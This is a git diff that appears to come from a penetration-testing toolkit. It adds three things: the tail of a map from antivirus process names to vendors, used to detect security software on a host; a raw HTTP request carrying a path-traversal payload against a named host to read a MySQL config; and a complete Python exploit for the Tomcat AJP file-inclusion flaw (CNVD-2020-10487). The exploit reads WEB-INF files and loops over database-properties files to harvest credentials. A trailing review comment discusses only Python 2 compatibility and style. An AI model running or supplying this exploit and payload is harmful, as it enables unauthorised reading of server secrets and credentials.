"Anti-Trojan Elite", +"arr.exe": "Application Request Route", +"atguard.exe": "AntiVir", +"atupdater.exe": "已知杀软进程,名称暂未收录", +"atwatch.exe": "Mustek", +"au.exe": "NSIS", +"aupdate.exe": "Symantec", +"auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录", +"autodown.exe": "AntiVirus AutoUpdater", +"avconsol.exe": "McAfee", +"avgcc32.exe": "AVG", +"avgctrl.exe": "AVG", +"avgemc.exe": "AVG", +"avgrsx.exe": "AVG", +"avgserv.exe": "AVG", +"avgserv9.exe": "AVG", +"avgw.exe": "AVG", +"avkpop.exe": "G DATA SOFTWARE AG", +"avkserv.exe": "G DATA SOFTWARE AG", +"avkservice.exe": "G DATA SOFTWARE AG", +"avkwctl9.exe": "G DATA SOFTWARE AG", +"avltmain.exe": "Panda Software Aplication", +"avnt.exe": "H+BEDV Datentechnik GmbH", +"avp32.exe": "Kaspersky Anti-Virus", +"avpcc.exe": " Kaspersky AntiVirus", +"avpdos32.exe": " Kaspersky AntiVirus", +"avpm.exe": " Kaspersky AntiVirus", +"avptc32.exe": " Kaspersky AntiVirus", +"avpupd.exe": " Kaspersky AntiVirus", +"avsynmgr.exe": "McAfee", +"avwin.exe": " H+BEDV", +"bargains.exe": "Exact Advertising SpyWare", +"beagle.exe": "Avast", +"blackd.exe": "BlackICE", +"blackice.exe": "BlackICE", +"blink.exe": "micromedia", +"blss.exe": "CBlaster", +"bootwarn.exe": "Symantec", +"bpc.exe": "Grokster", +"brasil.exe": "Exact Advertising", +"ccevtmgr.exe": "Norton Internet Security", +"cdp.exe": "CyberLink Corp.", +"cfd.exe": "Motive Communications", +"cfgwiz.exe": " Norton AntiVirus", +"claw95.exe": "已知杀软进程,名称暂未收录", +"claw95cf.exe": "已知杀软进程,名称暂未收录", +"clean.exe": "windows流氓软件清理大师", +"cleaner.exe": "windows流氓软件清理大师", +"cleaner3.exe": "windows流氓软件清理大师", +"cleanpc.exe": "windows流氓软件清理大师", +"cpd.exe": "McAfee", +"ctrl.exe": "已知杀软进程,名称暂未收录", +"cv.exe": "已知杀软进程,名称暂未收录", +"defalert.exe": "Symantec", +"defscangui.exe": "Symantec", +"defwatch.exe": "Norton Antivirus", +"doors.exe": "已知杀软进程,名称暂未收录", +"dpf.exe": "已知杀软进程,名称暂未收录", +"dpps2.exe": "PanicWare", +"dssagent.exe": "Broderbund", +"ecengine.exe": "已知杀软进程,名称暂未收录", +"emsw.exe": "Alset Inc", +"ent.exe": 
"已知杀软进程,名称暂未收录", +"espwatch.exe": "已知杀软进程,名称暂未收录", +"ethereal.exe": "RationalClearCase", +"exe.avxw.exe": "已知杀软进程,名称暂未收录", +"expert.exe": "已知杀软进程,名称暂未收录", +"f-prot95.exe": "已知杀软进程,名称暂未收录", +"fameh32.exe": "F-Secure", +"fast.exe": " FastUsr", +"fch32.exe": "F-Secure", +"fih32.exe": "F-Secure", +"findviru.exe": "F-Secure", +"firewall.exe": "AshampooSoftware", +"fnrb32.exe": "F-Secure", +"fp-win.exe": " F-Prot Antivirus OnDemand", +"fsaa.exe": "F-Secure", +"fsav.exe": "F-Secure", +"fsav32.exe": "F-Secure", +"fsav530stbyb.exe": "F-Secure", +"fsav530wtbyb.exe": "F-Secure", +"fsav95.exe": "F-Secure", +"fsgk32.exe": "F-Secure", +"fsm32.exe": "F-Secure", +"fsma32.exe": "F-Secure", +"fsmb32.exe": "F-Secure", +"gbmenu.exe": "已知杀软进程,名称暂未收录", +"guard.exe": "ewido", +"guarddog.exe": "ewido", +"htlog.exe": "已知杀软进程,名称暂未收录", +"htpatch.exe": "Silicon Integrated Systems Corporation", +"hwpe.exe": "已知杀软进程,名称暂未收录", +"iamapp.exe": "Symantec", +"iamserv.exe": "Symantec", +"iamstats.exe": "Symantec", +"iedriver.exe": " Urlblaze.com", +"iface.exe": "Panda Antivirus Module", +"infus.exe": "Infus Dialer", +"infwin.exe": "Msviewparasite", +"intdel.exe": "Inet Delivery", +"intren.exe": "已知杀软进程,名称暂未收录", +"jammer.exe": "已知杀软进程,名称暂未收录", +"kavpf.exe": "Kapersky", +"kazza.exe": "Kapersky", +"keenvalue.exe": "EUNIVERSE INC", +"launcher.exe": "Intercort Systems", +"ldpro.exe": "已知杀软进程,名称暂未收录", +"ldscan.exe": "Windows Trojans Inspector", +"localnet.exe": "已知杀软进程,名称暂未收录", +"luall.exe": "Symantec", +"luau.exe": "Symantec", +"lucomserver.exe": "Norton", +"mcagent.exe": "McAfee", +"mcmnhdlr.exe": "McAfee", +"mctool.exe": "McAfee", +"mcupdate.exe": "McAfee", +"mcvsrte.exe": "McAfee", +"mcvsshld.exe": "McAfee", +"mfin32.exe": "MyFreeInternetUpdate", +"mfw2en.exe": "MyFreeInternetUpdate", +"mfweng3.02d30.exe": "MyFreeInternetUpdate", +"mgavrtcl.exe": "McAfee", +"mgavrte.exe": "McAfee", +"mghtml.exe": "McAfee", +"mgui.exe": "BullGuard", +"minilog.exe": "Zone Labs Inc", +"mmod.exe": "EzulaInc", +"mostat.exe": 
"WurldMediaInc", +"mpfagent.exe": "McAfee", +"mpfservice.exe": "McAfee", +"mpftray.exe": "McAfee", +"mscache.exe": "Integrated Search Technologies Spyware", +"mscman.exe": "OdysseusMarketingInc", +"msmgt.exe": "Total Velocity Spyware", +"msvxd.exe": "W32/Datom-A", +"mwatch.exe": "已知杀软进程,名称暂未收录", +"nav.exe": "Reuters Limited", +"navapsvc.exe": "Norton AntiVirus", +"navapw32.exe": "Norton AntiVirus", +"navw32.exe": "Norton Antivirus", +"ndd32.exe": "诺顿磁盘医生", +"neowatchlog.exe": "已知杀软进程,名称暂未收录", +"netutils.exe": "已知杀软进程,名称暂未收录", +"nisserv.exe": "Norton", +"nisum.exe": "Norton", +"nmain.exe": "Norton", +"nod32.exe": "ESET Smart Security", +"norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录", +"notstart.exe": "已知杀软进程,名称暂未收录", +"nprotect.exe": "Symantec", +"npscheck.exe": "Norton", +"npssvc.exe": "Norton", +"ntrtscan.exe": "趋势反病毒应用程序", +"nui.exe": "已知杀软进程,名称暂未收录", +"otfix.exe": "已知杀软进程,名称暂未收录", +"outpostinstall.exe": "Outpost", +"patch.exe": "趋势科技", +"pavw.exe": "已知杀软进程,名称暂未收录", +"pcscan.exe": "趋势科技", +"pdsetup.exe": "已知杀软进程,名称暂未收录", +"persfw.exe": "Tiny Personal Firewall", +"pgmonitr.exe": "PromulGate SpyWare", +"pingscan.exe": "已知杀软进程,名称暂未收录", +"platin.exe": "已知杀软进程,名称暂未收录", +"pop3trap.exe": "PC-cillin", +"poproxy.exe": "NortonAntiVirus", +"popscan.exe": "已知杀软进程,名称暂未收录", +"powerscan.exe": "Integrated Search Technologies", +"ppinupdt.exe": "已知杀软进程,名称暂未收录", +"pptbc.exe": "已知杀软进程,名称暂未收录", +"ppvstop.exe": "已知杀软进程,名称暂未收录", +"prizesurfer.exe": "Prizesurfer", +"prmt.exe": "OpiStat", +"prmvr.exe": "Adtomi", +"processmonitor.exe": "Sysinternals", +"proport.exe": "已知杀软进程,名称暂未收录", +"protectx.exe": "ProtectX", +"pspf.exe": "已知杀软进程,名称暂未收录", +"purge.exe": "已知杀软进程,名称暂未收录", +"qconsole.exe": "Norton AntiVirus Quarantine Console", +"qserver.exe": "Norton Internet Security", +"rapapp.exe": "BlackICE", +"rb32.exe": "RapidBlaster", +"rcsync.exe": "PrizeSurfer", +"realmon.exe": "Realmon ", +"rescue.exe": "已知杀软进程,名称暂未收录", +"rescue32.exe": "卡巴斯基互联网安全套装", +"rshell.exe": "已知杀软进程,名称暂未收录", 
+"rtvscn95.exe": "Real-time virus scanner ", +"rulaunch.exe": "McAfee User Interface", +"run32dll.exe": "PAL PC Spy", +"safeweb.exe": "PSafe Tecnologia", +"sbserv.exe": "Norton Antivirus", +"scrscan.exe": "360杀毒", +"sfc.exe": "System file checker", +"sh.exe": "MKS Toolkit for Win3", +"showbehind.exe": "MicroSmarts Enterprise Component ", +"soap.exe": "System Soap Pro", +"sofi.exe": "已知杀软进程,名称暂未收录", +"sperm.exe": "已知杀软进程,名称暂未收录", +"supporter5.exe": "eScorcher反病毒", +"symproxysvc.exe": "Symantec", +"symtray.exe": "Symantec", +"tbscan.exe": "ThunderBYTE", +"tc.exe": "TimeCalende", +"titanin.exe": "TitanHide", +"tvmd.exe": "Total Velocity", +"tvtmd.exe": " Total Velocity", +"vettray.exe": "eTrust", +"vir-help.exe": "已知杀软进程,名称暂未收录", +"vnpc3000.exe": "已知杀软进程,名称暂未收录", +"vpc32.exe": "Symantec", +"vpc42.exe": "Symantec", +"vshwin32.exe": "McAfee", +"vsmain.exe": "McAfee", +"vsstat.exe": "McAfee", +"wfindv32.exe": "已知杀软进程,名称暂未收录", +"zapro.exe": "Zone Alarm", +"zonealarm.exe": "Zone Alarm", +"AVPM.exe": "Kaspersky", +"A2CMD.exe": "Emsisoft Anti-Malware", +"A2SERVICE.exe": "a-squared free", +"A2FREE.exe": "a-squared Free", +"ADVCHK.exe": "Norton AntiVirus", +"AGB.exe": "安天防线", +"AHPROCMONSERVER.exe": "安天防线", +"AIRDEFENSE.exe": "AirDefense", +"ALERTSVC.exe": "Norton AntiVirus", +"AVIRA.exe": "小红伞杀毒", +"AMON.exe": "Tiny Personal Firewall", +"AVZ.exe": "AVZ", +"ANTIVIR.exe": "已知杀软进程,名称暂未收录", +"APVXDWIN.exe": "熊猫卫士", +"ASHMAISV.exe": "Alwil", +"ASHSERV.exe": "Avast Anti-virus", +"ASHSIMPL.exe": "AVAST!VirusCleaner", +"ASHWEBSV.exe": "Avast", +"ASWUPDSV.exe": "Avast", +"ASWSCAN.exe": "Avast", +"AVCIMAN.exe": "熊猫卫士", +"AVCONSOL.exe": "McAfee", +"AVENGINE.exe": "熊猫卫士", +"AVESVC.exe": "Avira AntiVir Security Service", +"AVEVL32.exe": "已知杀软进程,名称暂未收录", +"AVGAM.exe": "AVG", +"AVGCC.exe": "AVG", +"AVGCHSVX.exe": "AVG", +"AVGCSRVX": "AVG", +"AVGNSX.exe": "AVG", +"AVGCC32.exe": "AVG", +"AVGCTRL.exe": "AVG", +"AVGEMC.exe": "AVG", +"AVGFWSRV.exe": "AVG", +"AVGNTMGR.exe": "AVG", +"AVGSERV.exe": 
"AVG", +"AVGTRAY.exe": "AVG", +"AVGUPSVC.exe": "AVG", +"AVINITNT.exe": "Command AntiVirus for NT Server", +"AVPCC.exe": "Kaspersky", +"AVSERVER.exe": "Kerio MailServer", +"AVSCHED32.exe": "H+BEDV", +"AVSYNMGR.exe": "McAfee", +"AVWUPSRV.exe": "H+BEDV", +"BDSWITCH.exe": "BitDefender Module", +"BLACKD.exe": "BlackICE", +"CCEVTMGR.exe": "Symantec", +"CFP.exe": "COMODO", +"CLAMWIN.exe": "ClamWin Portable", +"CUREIT.exe": "DrWeb CureIT", +"DEFWATCH.exe": "Norton Antivirus", +"DRWADINS.exe": "Dr.Web", +"DRWEB.exe": "Dr.Web", +"DEFENDERDAEMON.exe": "ShadowDefender", +"EWIDOCTRL.exe": "Ewido Security Suite", +"EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus", +"FIREWALL.exe": "AshampooSoftware", +"FPROTTRAY.exe": "F-PROT Antivirus", +"FPWIN.exe": "Verizon", +"FRESHCLAM.exe": "ClamAV", +"FSAV32.exe": "F-Secure", +"FSBWSYS.exe": "F-secure", +"FSDFWD.exe": "F-Secure", +"FSGK32.exe": "F-Secure", +"FSGK32ST.exe": "F-Secure", +"FSMA32.exe": "F-Secure", +"FSMB32.exe": "F-Secure", +"FSSM32.exe": "F-Secure", +"GUARDGUI.exe": "网游保镖", +"GUARDNT.exe": "IKARUS", +"IAMAPP.exe": "Symantec", +"INOCIT.exe": "eTrust", +"INORPC.exe": "eTrust", +"INORT.exe": "eTrust", +"INOTASK.exe": "eTrust", +"INOUPTNG.exe": "eTrust", +"ISAFE.exe": "eTrust", +"KAV.exe": "Kaspersky", +"KAVMM.exe": "Kaspersky", +"KAVPF.exe": "Kaspersky", +"KAVPFW.exe": "Kaspersky", +"KAVSTART.exe": "Kaspersky", +"KAVSVC.exe": "Kaspersky", +"KAVSVCUI.exe": "Kaspersky", +"KMAILMON.exe": "金山毒霸", +"MCAGENT.exe": "McAfee", +"MCMNHDLR.exe": "McAfee", +"MCREGWIZ.exe": "McAfee", +"MCUPDATE.exe": "McAfee", +"MCVSSHLD.exe": "McAfee", +"MINILOG.exe": "Zone Alarm", +"MYAGTSVC.exe": "McAfee", +"MYAGTTRY.exe": "McAfee", +"NAVAPSVC.exe": "Norton", +"NAVAPW32.exe": "Norton", +"NAVLU32.exe": "Norton", +"NAVW32.exe": "Norton Antivirus", +"NEOWATCHLOG.exe": "NeoWatch", +"NEOWATCHTRAY.exe": "NeoWatch", +"NISSERV.exe": "Norton", +"NISUM.exe": "Norton", +"NMAIN.exe": "Norton", +"NOD32.exe": "ESET NOD32", +"NPFMSG.exe": "Norman个人防火墙", 
+"NPROTECT.exe": "Symantec", +"NSMDTR.exe": "Norton", +"NTRTSCAN.exe": "趋势科技", +"OFCPFWSVC.exe": "OfficeScanNT", +"ONLINENT.exe": "已知杀软进程,名称暂未收录", +"OP_MON.exe": " OutpostFirewall", +"PAVFIRES.exe": "熊猫卫士", +"PAVFNSVR.exe": "熊猫卫士", +"PAVKRE.exe": "熊猫卫士", +"PAVPROT.exe": "熊猫卫士", +"PAVPROXY.exe": "熊猫卫士", +"PAVPRSRV.exe": "熊猫卫士", +"PAVSRV51.exe": "熊猫卫士", +"PAVSS.exe": "熊猫卫士", +"PCCGUIDE.exe": "PC-cillin", +"PCCIOMON.exe": "PC-cillin", +"PCCNTMON.exe": "PC-cillin", +"PCCPFW.exe": "趋势科技", +"PCCTLCOM.exe": "趋势科技", +"PCTAV.exe": "PC Tools AntiVirus", +"PERSFW.exe": "Tiny Personal Firewall", +"PERVAC.exe": "已知杀软进程,名称暂未收录", +"PESTPATROL.exe": "Ikarus", +"PREVSRV.exe": "熊猫卫士", +"RTVSCN95.exe": "Real-time Virus Scanner", +"SAVADMINSERVICE.exe": "SAV", +"SAVMAIN.exe": "SAV", +"SAVSCAN.exe": "SAV", +"SDHELP.exe": "Spyware Doctor", +"SHSTAT.exe": "McAfee", +"SPBBCSVC.exe": "Symantec", +"SPIDERCPL.exe": "Dr.Web", +"SPIDERML.exe": "Dr.Web", +"SPIDERUI.exe": "Dr.Web", +"SPYBOTSD.exe": "Spybot ", +"SWAGENT.exe": "SonicWALL", +"SWDOCTOR.exe": "SonicWALL", +"SWNETSUP.exe": "Sophos", +"SYMLCSVC.exe": "Symantec", +"SYMPROXYSVC.exe": "Symantec", +"SYMSPORT.exe": "Sysmantec", +"SYMWSC.exe": "Sysmantec", +"SYNMGR.exe": "Sysmantec", +"TMLISTEN.exe": "趋势科技", +"TMNTSRV.exe": "趋势科技", +"TMPROXY.exe": "趋势科技", +"TNBUTIL.exe": "Anti-Virus", +"VBA32ECM.exe": "已知杀软进程,名称暂未收录", +"VBA32IFS.exe": "已知杀软进程,名称暂未收录", +"VBA32PP3.exe": "已知杀软进程,名称暂未收录", +"VCRMON.exe": "VirusChaser", +"VRMONNT.exe": "HAURI", +"VRMONSVC.exe": "HAURI", +"VSHWIN32.exe": "McAfee", +"VSSTAT.exe": "McAfee", +"XCOMMSVR.exe": "BitDefender", +"ZONEALARM.exe": "Zone Alarm", +"360rp.exe": "360杀毒", +"afwServ.exe": " Avast Antivirus ", +"safeboxTray.exe": "360杀毒", +"360safebox.exe": "360杀毒", +"QQPCTray.exe": "QQ电脑管家", +"KSafeTray.exe": "金山毒霸", +"KSafeSvc.exe": "金山毒霸", +"KWatch.exe": "金山毒霸", +"gov_defence_service.exe": "云锁", +"gov_defence_daemon.exe": "云锁", +"smartscreen.exe": "Windows Defender", +"SunloginClient.exe": "向日葵", 
+"finalshell.exe": "finalshell终端管理" \ No newline at end of file diff --git a/property/test.txt b/property/test.txt new file mode 100644 index 0000000..4249097 --- /dev/null +++ b/property/test.txt @@ -0,0 +1,10 @@ +POST /mac/gateway.php HTTP/1.1 +Host: q.leoei.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 +Content-Length: 43 +Charset: utf-8 +Content-Type: application/x-www-form-urlencoded +Referer: https://servicewechat.com/wxe1d5f6d5f6c6a21f/5/page-frame.html +Accept-Encoding: gzip + +json={"url":"/general/../../mysql5/my.ini"} \ No newline at end of file diff --git a/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py b/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py new file mode 100644 index 0000000..8defb30 --- /dev/null +++ b/pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py 
@@ -0,0 +1,326 @@ +######f0ng######usage:ip -p port +# -*- coding: utf-8 -*- + +#CNVD-2020-10487 Tomcat-Ajp lfi + +import struct + +# Some references: +# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html +def pack_string(s): + if s is None: + return struct.pack(">h", -1) + l = len(s) + return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) +def unpack(stream, fmt): + size = struct.calcsize(fmt) + buf = stream.read(size) + return struct.unpack(fmt, buf) +def unpack_string(stream): + size, = unpack(stream, ">h") + if size == -1: # null string + return None + res, = unpack(stream, "%ds" % size) + stream.read(1) # \0 + return res +class NotFoundException(Exception): + pass +class AjpBodyRequest(object): + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + MAX_REQUEST_LENGTH = 8186 + def __init__(self, data_stream, data_len, data_direction=None): + self.data_stream = data_stream + self.data_len = data_len + self.data_direction = data_direction + def serialize(self): + data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) + if len(data) == 0: + return struct.pack(">bbH", 0x12, 0x34, 0x00) + else: + res = struct.pack(">H", len(data)) + res += data + if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbH", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbH", 0x41, 0x42, len(res)) + return header + res + def send_and_receive(self, socket, stream): + while True: + data = self.serialize() + socket.send(data) + r = AjpResponse.receive(stream) + while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: + r = AjpResponse.receive(stream) + + if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: + break +class AjpForwardRequest(object): + _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, 
UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28) + REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} + # server == web server, container == servlet + SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) + COMMON_HEADERS = ["SC_REQ_ACCEPT", + "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION", + "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2", + "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" + ] + ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] + def __init__(self, data_direction=None): + self.prefix_code = 0x02 + self.method = None + self.protocol = None + self.req_uri = None + self.remote_addr = None + self.remote_host = None + self.server_name = None + self.server_port = None + self.is_ssl = None + self.num_headers = None + self.request_headers = None + self.attributes = None + self.data_direction = data_direction + def pack_headers(self): + self.num_headers = len(self.request_headers) + res = "" + res = struct.pack(">h", self.num_headers) + for h_name in self.request_headers: + if h_name.startswith("SC_REQ"): + code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 + res += struct.pack("BB", 0xA0, code) + else: + res += pack_string(h_name) + + res += pack_string(self.request_headers[h_name]) + return res + + def pack_attributes(self): + res = b"" + for attr in self.attributes: + a_name = attr['name'] + code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 + res += struct.pack("b", code) + if a_name == "req_attribute": + aa_name, a_value = attr['value'] + res += pack_string(aa_name) + res += pack_string(a_value) + else: + res += pack_string(attr['value']) + res += struct.pack("B", 0xFF) + return res + def 
serialize(self): + res = "" + res = struct.pack("bb", self.prefix_code, self.method) + res += pack_string(self.protocol) + res += pack_string(self.req_uri) + res += pack_string(self.remote_addr) + res += pack_string(self.remote_host) + res += pack_string(self.server_name) + res += struct.pack(">h", self.server_port) + res += struct.pack("?", self.is_ssl) + res += self.pack_headers() + res += self.pack_attributes() + if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: + header = struct.pack(">bbh", 0x12, 0x34, len(res)) + else: + header = struct.pack(">bbh", 0x41, 0x42, len(res)) + return header + res + def parse(self, raw_packet): + stream = StringIO(raw_packet) + self.magic1, self.magic2, data_len = unpack(stream, "bbH") + self.prefix_code, self.method = unpack(stream, "bb") + self.protocol = unpack_string(stream) + self.req_uri = unpack_string(stream) + self.remote_addr = unpack_string(stream) + self.remote_host = unpack_string(stream) + self.server_name = unpack_string(stream) + self.server_port = unpack(stream, ">h") + self.is_ssl = unpack(stream, "?") + self.num_headers, = unpack(stream, ">H") + self.request_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code > 0xA000: + h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] + else: + h_name = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + self.request_headers[h_name] = h_value + def send_and_receive(self, socket, stream, save_cookies=False): + res = [] + i = socket.sendall(self.serialize()) + if self.method == AjpForwardRequest.POST: + return res + + r = AjpResponse.receive(stream) + assert r.prefix_code == AjpResponse.SEND_HEADERS + res.append(r) + if save_cookies and 'Set-Cookie' in r.response_headers: + self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] + + # read body chunks and end response packets + while True: + r = AjpResponse.receive(stream) + res.append(r) + if r.prefix_code == 
AjpResponse.END_RESPONSE: + break + elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: + continue + else: + raise NotImplementedError + break + + return res + +class AjpResponse(object): + _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) + COMMON_SEND_HEADERS = [ + "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", + "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" + ] + def parse(self, stream): + # read headers + self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") + + if self.prefix_code == AjpResponse.SEND_HEADERS: + self.parse_send_headers(stream) + elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: + self.parse_send_body_chunk(stream) + elif self.prefix_code == AjpResponse.END_RESPONSE: + self.parse_end_response(stream) + elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: + self.parse_get_body_chunk(stream) + else: + raise NotImplementedError + + def parse_send_headers(self, stream): + self.http_status_code, = unpack(stream, ">H") + self.http_status_msg = unpack_string(stream) + self.num_headers, = unpack(stream, ">H") + self.response_headers = {} + for i in range(self.num_headers): + code, = unpack(stream, ">H") + if code <= 0xA000: # custom header + h_name, = unpack(stream, "%ds" % code) + stream.read(1) # \0 + h_value = unpack_string(stream) + else: + h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001] + h_value = unpack_string(stream) + self.response_headers[h_name] = h_value + + def parse_send_body_chunk(self, stream): + self.data_length, = unpack(stream, ">H") + self.data = stream.read(self.data_length+1) + + def parse_end_response(self, stream): + self.reuse, = unpack(stream, "b") + + def parse_get_body_chunk(self, stream): + rlen, = unpack(stream, ">H") + return rlen + + @staticmethod + def receive(stream): + r = AjpResponse() + r.parse(stream) + return r + +import socket + +def prepare_ajp_forward_request(target_host, req_uri, 
method=AjpForwardRequest.GET): + fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) + fr.method = method + fr.protocol = "HTTP/1.1" + fr.req_uri = req_uri + fr.remote_addr = target_host + fr.remote_host = None + fr.server_name = target_host + fr.server_port = 80 + fr.request_headers = { + 'SC_REQ_ACCEPT': 'text/html', + 'SC_REQ_CONNECTION': 'keep-alive', + 'SC_REQ_CONTENT_LENGTH': '0', + 'SC_REQ_HOST': target_host, + 'SC_REQ_USER_AGENT': 'Mozilla', + 'Accept-Encoding': 'gzip, deflate, sdch', + 'Accept-Language': 'en-US,en;q=0.5', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' + } + fr.is_ssl = False + fr.attributes = [] + return fr + +class Tomcat(object): + def __init__(self, target_host, target_port): + self.target_host = target_host + self.target_port = target_port + + self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.socket.connect((target_host, target_port)) + self.stream = self.socket.makefile("rb", bufsize=0) + + def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): + self.req_uri = req_uri + self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) + print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) + if user is not None and password is not None: + self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '') + for h in headers: + self.forward_request.request_headers[h] = headers[h] + for a in attributes: + self.forward_request.attributes.append(a) + responses = self.forward_request.send_and_receive(self.socket, self.stream) + if len(responses) == 0: + return None, None + snd_hdrs_res = responses[0] + data_res = responses[1:-1] + if len(data_res) == 0: + print("No data in response. 
Headers:%s\n" % snd_hdrs_res.response_headers) + return snd_hdrs_res, data_res + +''' +javax.servlet.include.request_uri +javax.servlet.include.path_info +javax.servlet.include.servlet_path +''' + +import argparse +parser = argparse.ArgumentParser() +parser.add_argument("target", type=str, help="Hostname or IP to attack") +parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)") +parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)") +args = parser.parse_args() +t = Tomcat(args.target, args.port) + +_,data = t.perform_request('/asdf',attributes=[ + {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, + {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]}, + {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, + ]) +print('----------------------------') +print("".join([d.data for d in data])) + +if "WEB-INF" in "".join([d.data for d in data]): + print("**********************注意可能有WEB-INF配置文件*************************") + +words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties', +'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',] + +for word in words_list: + + print(":::::::::" + word + ":::::::::") + + _,data = t.perform_request('/asdf',attributes=[ + {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, + {'name':'req_attribute','value':['javax.servlet.include.path_info',word]}, + {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, + ]) + print('----------------------------') + if "Error report" in "".join([d.data for d in data]): + pass + else: + print("".join([d.data for d in data])) 
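Review bot: The script is Python 2-only — `self.socket.makefile("rb", bufsize=0)` in `Tomcat.__init__`, `.encode('base64')` in `perform_request`, and `res = ""` followed by `+=` of `struct.pack` output in `AjpForwardRequest.serialize` all fail under Python 3 — yet nothing in the header says so; the banner line should be accompanied by `#!/usr/bin/env python2` or a `# Requires Python 2.7` comment. `AjpForwardRequest.parse` references `StringIO`, which is never imported in this file, so that method raises `NameError` if called; drop the unused method or import the name. The driver code after the `argparse` block runs at import time and never closes the socket opened in `Tomcat.__init__`; the sibling file in this commit wraps the same flow in `if __name__ == "__main__":`, and the socket should be closed in a `finally`. `"".join([d.data for d in data])` is rebuilt three times per response; bind it once to a local and test that. `perform_request` also uses mutable defaults (`headers={}`, `attributes=[]`), which should be `None` with an in-body fallback.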
diff --git a/pythonexp/Tomcat/CNVD-2020-10487-pro.py b/pythonexp/Tomcat/CNVD-2020-10487-pro.py
new file mode 100644
index 0000000..c67ba88
--- /dev/null
+++ b/pythonexp/Tomcat/CNVD-2020-10487-pro.py
